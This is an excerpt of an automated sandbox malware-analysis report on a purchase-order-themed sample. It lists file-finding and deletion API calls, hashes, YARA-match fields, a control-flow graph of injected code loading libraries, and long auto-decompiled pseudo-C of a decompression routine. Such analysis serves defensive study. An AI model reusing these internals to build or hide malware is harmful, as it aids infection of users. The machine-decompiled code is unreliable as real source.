                                                                                      0x00405e75
                                                                                      0x00405e7b
                                                                                      0x00405e7b
                                                                                      0x00405e75
                                                                                      0x00000000
                                                                                      0x00405e6b
                                                                                      0x00405e39
                                                                                      0x00405e41
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405e43
                                                                                      0x00405e4b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405e4d
                                                                                      0x00405e55
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405eb6
                                                                                      0x00405ebe
                                                                                      0x00405ec4
                                                                                      0x00405ec4
                                                                                      0x00405ecd
                                                                                      0x00000000
                                                                                      0x00405ecd
                                                                                      0x00405df8
                                                                                      0x00405e00
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405dbc
                                                                                      0x00405dbc
                                                                                      0x00405dbe
                                                                                      0x00405ede
                                                                                      0x00405ee0
                                                                                      0x00405ee3
                                                                                      0x00405f34
                                                                                      0x00405f34
                                                                                      0x00405f34
                                                                                      0x00405ee5
                                                                                      0x00405ee8
                                                                                      0x00405ef3
                                                                                      0x00405ef8
                                                                                      0x00405efa
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405efd
                                                                                      0x00405f09
                                                                                      0x00405f0e
                                                                                      0x00405f10
                                                                                      0x00000000
                                                                                      0x00405f2b
                                                                                      0x00405f12
                                                                                      0x00405f15
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405f1a
                                                                                      0x00000000
                                                                                      0x00405f21
                                                                                      0x00405eea
                                                                                      0x00405eea
                                                                                      0x00000000
                                                                                      0x00405eea
                                                                                      0x00405dc4
                                                                                      0x00405dc7
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405dc7

                                                                                      APIs
                                                                                      • DeleteFileW.KERNELBASE(?,?,75703420,75702EE0,00000000), ref: 00405D9D
                                                                                      • lstrcatW.KERNEL32(00425750,\*.*), ref: 00405DE5
                                                                                      • lstrcatW.KERNEL32(?,0040A014), ref: 00405E08
                                                                                      • lstrlenW.KERNEL32(?,?,0040A014,?,00425750,?,?,75703420,75702EE0,00000000), ref: 00405E0E
                                                                                      • FindFirstFileW.KERNEL32(00425750,?,?,?,0040A014,?,00425750,?,?,75703420,75702EE0,00000000), ref: 00405E1E
                                                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
                                                                                      • FindClose.KERNEL32(00000000), ref: 00405ECD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                      • String ID: .$.$PWB$\*.*
                                                                                      • API String ID: 2035342205-2468439962
                                                                                      • Opcode ID: 84a2dab94316d3ca87ace9b621727089dce8e4f508d821c3cecceca6b12cc675
                                                                                      • Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
                                                                                      • Opcode Fuzzy Hash: 84a2dab94316d3ca87ace9b621727089dce8e4f508d821c3cecceca6b12cc675
                                                                                      • Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 913 3c777fc-3c777fd 914 3c777ff-3c7780c 913->914 915 3c7784c-3c77851 913->915 916 3c77852-3c7785c 914->916 915->916 917 3c7785e-3c7786a call 3c7786b 916->917 918 3c7789b-3c778d7 916->918 920 3c778dd-3c7792c call 3c77683 918->920 921 3c7b9da-3c7ba20 918->921 929 3c77931-3c779b1 920->929 924 3c7ba22-3c7ba72 921->924 925 3c7ba7a-3c7baa3 921->925 930 3c7ba73-3c7ba78 924->930 925->930 931 3c7baa5-3c7bb1c 925->931 933 3c779b7-3c779c4 929->933 934 3c81659-3c81709 929->934 930->925 938 3c779c6-3c77a32 call 3c77bad 933->938 940 3c81739-3c81747 LoadLibraryA call 3c81788 934->940 941 3c8170b-3c81736 call 3c81e75 call 3c81788 934->941 952 3c738ec-3c738fa call 3c73739 938->952 953 3c77a38-3c77a4d 938->953 941->940 961 3c7392c-3c73931 952->961 956 3c77a4f-3c77a52 953->956 957 3c77a59-3c77adc 953->957 956->957 957->938 960 3c77ae2-3c77aec 957->960 960->929 962 3c77af2-3c77b22 960->962 963 3c73955-3c73957 961->963 964 3c73933-3c7393c 961->964 962->929 967 3c77b28-3c77ba0 962->967 965 3c738e5-3c738eb 963->965 966 3c73959-3c73975 963->966 969 3c7393e-3c7394a 964->969 970 3c7390a-3c73929 964->970 965->952 971 3c73977-3c7397d 966->971 972 3c73983-3c7398c 966->972 967->929 975 3c77ba6-3c77bac 967->975 974 3c7398e-3c7399b 969->974 970->961 972->974
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42101494112.0000000003C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_3c70000_PO#4200000866.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: B$T]S&$`
                                                                                      • API String ID: 0-4195665176
                                                                                      • Opcode ID: cea33ecc9e4ea06a8b001cf048ec2a262ea00dc892aaea1e2d1dcaf844035646
                                                                                      • Instruction ID: a2adc625054f44fe3e68c23a80b5a93dc6329f43c814a805906140d3ed940652
                                                                                      • Opcode Fuzzy Hash: cea33ecc9e4ea06a8b001cf048ec2a262ea00dc892aaea1e2d1dcaf844035646
                                                                                      • Instruction Fuzzy Hash: E5B19B356083C69ECF34DE39C9993F93FA29F56354F29066EDC8ACF611D67086068A42
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 98%
                                                                                      			E00406D5F() {
                                                                                      				unsigned short _t531;
                                                                                      				signed int _t532;
                                                                                      				void _t533;
                                                                                      				void* _t534;
                                                                                      				signed int _t535;
                                                                                      				signed int _t565;
                                                                                      				signed int _t568;
                                                                                      				signed int _t590;
                                                                                      				signed int* _t607;
                                                                                      				void* _t614;
                                                                                      
                                                                                      				L0:
                                                                                      				while(1) {
                                                                                      					L0:
                                                                                      					if( *(_t614 - 0x40) != 0) {
                                                                                      						 *(_t614 - 0x34) = 1;
                                                                                      						 *(_t614 - 0x84) = 7;
                                                                                      						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                                                                                      						L132:
                                                                                      						 *(_t614 - 0x54) = _t607;
                                                                                      						L133:
                                                                                      						_t531 =  *_t607;
                                                                                      						_t590 = _t531 & 0x0000ffff;
                                                                                      						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                                                                                      						if( *(_t614 - 0xc) >= _t565) {
                                                                                      							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                                                                                      							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                                                                                      							 *(_t614 - 0x40) = 1;
                                                                                      							_t532 = _t531 - (_t531 >> 5);
                                                                                      							 *_t607 = _t532;
                                                                                      						} else {
                                                                                      							 *(_t614 - 0x10) = _t565;
                                                                                      							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                                                      							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                                                                                      						}
                                                                                      						if( *(_t614 - 0x10) >= 0x1000000) {
                                                                                      							L139:
                                                                                      							_t533 =  *(_t614 - 0x84);
                                                                                      							L140:
                                                                                      							 *(_t614 - 0x88) = _t533;
                                                                                      							goto L1;
                                                                                      						} else {
                                                                                      							L137:
                                                                                      							if( *(_t614 - 0x6c) == 0) {
                                                                                      								 *(_t614 - 0x88) = 5;
                                                                                      								goto L170;
                                                                                      							}
                                                                                      							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                                                                                      							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                      							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                                      							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                                                      							goto L139;
                                                                                      						}
                                                                                      					} else {
                                                                                      						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                      						__esi =  *(__ebp - 0x60);
                                                                                      						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                      						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                      						__ecx =  *(__ebp - 0x3c);
                                                                                      						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                      						__ecx =  *(__ebp - 4);
                                                                                      						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                      						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                      						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                      						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                      						if( *(__ebp - 0x38) >= 4) {
                                                                                      							if( *(__ebp - 0x38) >= 0xa) {
                                                                                      								_t97 = __ebp - 0x38;
                                                                                      								 *_t97 =  *(__ebp - 0x38) - 6;
                                                                                      							} else {
                                                                                      								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                      							}
                                                                                      						} else {
                                                                                      							 *(__ebp - 0x38) = 0;
                                                                                      						}
                                                                                      						if( *(__ebp - 0x34) == __edx) {
                                                                                      							__ebx = 0;
                                                                                      							__ebx = 1;
                                                                                      							L60:
                                                                                      							__eax =  *(__ebp - 0x58);
                                                                                      							__edx = __ebx + __ebx;
                                                                                      							__ecx =  *(__ebp - 0x10);
                                                                                      							__esi = __edx + __eax;
                                                                                      							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                      							__ax =  *__esi;
                                                                                      							 *(__ebp - 0x54) = __esi;
                                                                                      							__edi = __ax & 0x0000ffff;
                                                                                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                      							if( *(__ebp - 0xc) >= __ecx) {
                                                                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      								__cx = __ax;
                                                                                      								_t216 = __edx + 1; // 0x1
                                                                                      								__ebx = _t216;
                                                                                      								__cx = __ax >> 5;
                                                                                      								 *__esi = __ax;
                                                                                      							} else {
                                                                                      								 *(__ebp - 0x10) = __ecx;
                                                                                      								0x800 = 0x800 - __edi;
                                                                                      								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                      								__ebx = __ebx + __ebx;
                                                                                      								 *__esi = __cx;
                                                                                      							}
                                                                                      							 *(__ebp - 0x44) = __ebx;
                                                                                      							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      								L59:
                                                                                      								if(__ebx >= 0x100) {
                                                                                      									goto L54;
                                                                                      								}
                                                                                      								goto L60;
                                                                                      							} else {
                                                                                      								L57:
                                                                                      								if( *(__ebp - 0x6c) == 0) {
                                                                                      									 *(__ebp - 0x88) = 0xf;
                                                                                      									goto L170;
                                                                                      								}
                                                                                      								__ecx =  *(__ebp - 0x70);
                                                                                      								__eax =  *(__ebp - 0xc);
                                                                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      								_t202 = __ebp - 0x70;
                                                                                      								 *_t202 =  *(__ebp - 0x70) + 1;
                                                                                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      								goto L59;
                                                                                      							}
                                                                                      						} else {
                                                                                      							__eax =  *(__ebp - 0x14);
                                                                                      							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                      							if(__eax >=  *(__ebp - 0x74)) {
                                                                                      								__eax = __eax +  *(__ebp - 0x74);
                                                                                      							}
                                                                                      							__ecx =  *(__ebp - 8);
                                                                                      							__ebx = 0;
                                                                                      							__ebx = 1;
                                                                                      							__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                      							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                      							L40:
                                                                                      							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                      							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                      							__ecx =  *(__ebp - 0x58);
                                                                                      							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                      							 *(__ebp - 0x48) = __eax;
                                                                                      							__eax = __eax + 1;
                                                                                      							__eax = __eax << 8;
                                                                                      							__eax = __eax + __ebx;
                                                                                      							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                      							__ax =  *__esi;
                                                                                      							 *(__ebp - 0x54) = __esi;
                                                                                      							__edx = __ax & 0x0000ffff;
                                                                                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                      							if( *(__ebp - 0xc) >= __ecx) {
                                                                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      								__cx = __ax;
                                                                                      								 *(__ebp - 0x40) = 1;
                                                                                      								__cx = __ax >> 5;
                                                                                      								__ebx = __ebx + __ebx + 1;
                                                                                      								 *__esi = __ax;
                                                                                      							} else {
                                                                                      								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                      								 *(__ebp - 0x10) = __ecx;
                                                                                      								0x800 = 0x800 - __edx;
                                                                                      								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                      								__ebx = __ebx + __ebx;
                                                                                      								 *__esi = __cx;
                                                                                      							}
                                                                                      							 *(__ebp - 0x44) = __ebx;
                                                                                      							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      								L38:
                                                                                      								__eax =  *(__ebp - 0x40);
                                                                                      								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                      									while(1) {
                                                                                      										if(__ebx >= 0x100) {
                                                                                      											break;
                                                                                      										}
                                                                                      										__eax =  *(__ebp - 0x58);
                                                                                      										__edx = __ebx + __ebx;
                                                                                      										__ecx =  *(__ebp - 0x10);
                                                                                      										__esi = __edx + __eax;
                                                                                      										__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                      										__ax =  *__esi;
                                                                                      										 *(__ebp - 0x54) = __esi;
                                                                                      										__edi = __ax & 0x0000ffff;
                                                                                      										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                      										if( *(__ebp - 0xc) >= __ecx) {
                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      											__cx = __ax;
                                                                                      											_t169 = __edx + 1; // 0x1
                                                                                      											__ebx = _t169;
                                                                                      											__cx = __ax >> 5;
                                                                                      											 *__esi = __ax;
                                                                                      										} else {
                                                                                      											 *(__ebp - 0x10) = __ecx;
                                                                                      											0x800 = 0x800 - __edi;
                                                                                      											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                      											__ebx = __ebx + __ebx;
                                                                                      											 *__esi = __cx;
                                                                                      										}
                                                                                      										 *(__ebp - 0x44) = __ebx;
                                                                                      										if( *(__ebp - 0x10) < 0x1000000) {
                                                                                      											L45:
                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                      												 *(__ebp - 0x88) = 0xe;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											_t155 = __ebp - 0x70;
                                                                                      											 *_t155 =  *(__ebp - 0x70) + 1;
                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      										}
                                                                                      									}
                                                                                      									L53:
                                                                                      									_t172 = __ebp - 0x34;
                                                                                      									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                                                                                      									L54:
                                                                                      									__al =  *(__ebp - 0x44);
                                                                                      									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                      									L55:
                                                                                      									if( *(__ebp - 0x64) == 0) {
                                                                                      										 *(__ebp - 0x88) = 0x1a;
                                                                                      										goto L170;
                                                                                      									}
                                                                                      									__ecx =  *(__ebp - 0x68);
                                                                                      									__al =  *(__ebp - 0x5c);
                                                                                      									__edx =  *(__ebp - 8);
                                                                                      									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                      									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                      									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                      									 *( *(__ebp - 0x68)) = __al;
                                                                                      									__ecx =  *(__ebp - 0x14);
                                                                                      									 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                      									__eax = __ecx + 1;
                                                                                      									__edx = 0;
                                                                                      									_t191 = __eax %  *(__ebp - 0x74);
                                                                                      									__eax = __eax /  *(__ebp - 0x74);
                                                                                      									__edx = _t191;
                                                                                      									L79:
                                                                                      									 *(__ebp - 0x14) = __edx;
                                                                                      									L80:
                                                                                      									 *(__ebp - 0x88) = 2;
                                                                                      									goto L1;
                                                                                      								}
                                                                                      								if(__ebx >= 0x100) {
                                                                                      									goto L53;
                                                                                      								}
                                                                                      								goto L40;
                                                                                      							} else {
                                                                                      								L36:
                                                                                      								if( *(__ebp - 0x6c) == 0) {
                                                                                      									 *(__ebp - 0x88) = 0xd;
                                                                                      									L170:
                                                                                      									_t568 = 0x22;
                                                                                      									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                                                                                      									_t535 = 0;
                                                                                      									L172:
                                                                                      									return _t535;
                                                                                      								}
                                                                                      								__ecx =  *(__ebp - 0x70);
                                                                                      								__eax =  *(__ebp - 0xc);
                                                                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      								_t121 = __ebp - 0x70;
                                                                                      								 *_t121 =  *(__ebp - 0x70) + 1;
                                                                                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      								goto L38;
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      					L1:
                                                                                      					_t534 =  *(_t614 - 0x88);
                                                                                      					if(_t534 > 0x1c) {
                                                                                      						L171:
                                                                                      						_t535 = _t534 | 0xffffffff;
                                                                                      						goto L172;
                                                                                      					}
                                                                                      					switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                                                                      						case 0:
                                                                                      							if( *(_t614 - 0x6c) == 0) {
                                                                                      								goto L170;
                                                                                      							}
                                                                                      							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                      							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                                      							_t534 =  *( *(_t614 - 0x70));
                                                                                      							if(_t534 > 0xe1) {
                                                                                      								goto L171;
                                                                                      							}
                                                                                      							_t538 = _t534 & 0x000000ff;
                                                                                      							_push(0x2d);
                                                                                      							asm("cdq");
                                                                                      							_pop(_t570);
                                                                                      							_push(9);
                                                                                      							_pop(_t571);
                                                                                      							_t610 = _t538 / _t570;
                                                                                      							_t540 = _t538 % _t570 & 0x000000ff;
                                                                                      							asm("cdq");
                                                                                      							_t605 = _t540 % _t571 & 0x000000ff;
                                                                                      							 *(_t614 - 0x3c) = _t605;
                                                                                      							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                                                                                      							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                                      							_t613 = (0x300 << _t605 + _t610) + 0x736;
                                                                                      							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                                                                                      								L10:
                                                                                      								if(_t613 == 0) {
                                                                                      									L12:
                                                                                      									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                                                                                      									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                                                      									goto L15;
                                                                                      								} else {
                                                                                      									goto L11;
                                                                                      								}
                                                                                      								do {
                                                                                      									L11:
                                                                                      									_t613 = _t613 - 1;
                                                                                      									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                                                                                      								} while (_t613 != 0);
                                                                                      								goto L12;
                                                                                      							}
                                                                                      							if( *(_t614 - 4) != 0) {
                                                                                      								GlobalFree( *(_t614 - 4));
                                                                                      							}
                                                                                      							_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                      							 *(_t614 - 4) = _t534;
                                                                                      							if(_t534 == 0) {
                                                                                      								goto L171;
                                                                                      							} else {
                                                                                      								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
                                                                                      								goto L10;
                                                                                      							}
                                                                                      						case 1:
                                                                                      							L13:
                                                                                      							__eflags =  *(_t614 - 0x6c);
                                                                                      							if( *(_t614 - 0x6c) == 0) {
                                                                                      								 *(_t614 - 0x88) = 1;
                                                                                      								goto L170;
                                                                                      							}
                                                                                      							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                      							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                                                                                      							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                                      							_t45 = _t614 - 0x48;
                                                                                      							 *_t45 =  *(_t614 - 0x48) + 1;
                                                                                      							__eflags =  *_t45;
                                                                                      							L15:
                                                                                      							if( *(_t614 - 0x48) < 4) {
                                                                                      								goto L13;
                                                                                      							}
                                                                                      							_t546 =  *(_t614 - 0x40);
                                                                                      							if(_t546 ==  *(_t614 - 0x74)) {
                                                                                      								L20:
                                                                                      								 *(_t614 - 0x48) = 5;
                                                                                      								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                                                                                      								goto L23;
                                                                                      							}
                                                                                      							 *(_t614 - 0x74) = _t546;
                                                                                      							if( *(_t614 - 8) != 0) {
                                                                                      								GlobalFree( *(_t614 - 8));
                                                                                      							}
                                                                                      							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                                                                                      							 *(_t614 - 8) = _t534;
                                                                                      							if(_t534 == 0) {
                                                                                      								goto L171;
                                                                                      							} else {
                                                                                      								goto L20;
                                                                                      							}
                                                                                      						case 2:
                                                                                      							L24:
                                                                                      							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                                                                                      							 *(_t614 - 0x84) = 6;
                                                                                      							 *(_t614 - 0x4c) = _t553;
                                                                                      							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                                                                                      							goto L132;
                                                                                      						case 3:
                                                                                      							L21:
                                                                                      							__eflags =  *(_t614 - 0x6c);
                                                                                      							if( *(_t614 - 0x6c) == 0) {
                                                                                      								 *(_t614 - 0x88) = 3;
                                                                                      								goto L170;
                                                                                      							}
                                                                                      							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                      							_t67 = _t614 - 0x70;
                                                                                      							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                                                                                      							__eflags =  *_t67;
                                                                                      							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                                                      							L23:
                                                                                      							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                                                                                      							if( *(_t614 - 0x48) != 0) {
                                                                                      								goto L21;
                                                                                      							}
                                                                                      							goto L24;
                                                                                      						case 4:
                                                                                      							goto L133;
                                                                                      						case 5:
                                                                                      							goto L137;
                                                                                      						case 6:
                                                                                      							goto L0;
                                                                                      						case 7:
                                                                                      							__eflags =  *(__ebp - 0x40) - 1;
                                                                                      							if( *(__ebp - 0x40) != 1) {
                                                                                      								__eax =  *(__ebp - 0x24);
                                                                                      								 *(__ebp - 0x80) = 0x16;
                                                                                      								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                      								__eax =  *(__ebp - 0x28);
                                                                                      								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                      								__eax =  *(__ebp - 0x2c);
                                                                                      								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                      								__eax = 0;
                                                                                      								__eflags =  *(__ebp - 0x38) - 7;
                                                                                      								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                      								__al = __al & 0x000000fd;
                                                                                      								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                      								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                      								__eax =  *(__ebp - 4);
                                                                                      								__eax =  *(__ebp - 4) + 0x664;
                                                                                      								__eflags = __eax;
                                                                                      								 *(__ebp - 0x58) = __eax;
                                                                                      								goto L68;
                                                                                      							}
                                                                                      							__eax =  *(__ebp - 4);
                                                                                      							__ecx =  *(__ebp - 0x38);
                                                                                      							 *(__ebp - 0x84) = 8;
                                                                                      							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                      							goto L132;
                                                                                      						case 8:
                                                                                      							__eflags =  *(__ebp - 0x40);
                                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                                      								__eax =  *(__ebp - 4);
                                                                                      								__ecx =  *(__ebp - 0x38);
                                                                                      								 *(__ebp - 0x84) = 0xa;
                                                                                      								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                      							} else {
                                                                                      								__eax =  *(__ebp - 0x38);
                                                                                      								__ecx =  *(__ebp - 4);
                                                                                      								__eax =  *(__ebp - 0x38) + 0xf;
                                                                                      								 *(__ebp - 0x84) = 9;
                                                                                      								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                      								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                      							}
                                                                                      							goto L132;
                                                                                      						case 9:
                                                                                      							__eflags =  *(__ebp - 0x40);
